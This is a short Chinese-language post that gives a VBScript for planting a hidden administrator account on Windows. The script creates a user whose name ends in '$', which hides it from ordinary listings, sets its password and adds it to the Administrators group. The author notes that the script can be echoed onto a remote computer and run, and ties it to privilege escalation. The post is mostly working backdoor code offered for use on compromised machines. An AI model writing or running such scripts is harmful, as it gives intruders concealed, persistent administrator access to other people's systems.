以下文件保存为vbs,同时xxxx$表示用户名,yyyy表示密码.带$符号具有帐号隐藏属性(但是用windows的计算机管理的帐号管理可以看到).

使用vbs的好处是可以通过echo 输入到远程计算机中,然后运行.(具体提权过程请参照本人相关的文章).

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","xxxx$")
od.SetPassword "yyyy"
od.SetInfo
Set of=GetObject(os&"/xxxx$",user)
oe.add os&"/xxxx$"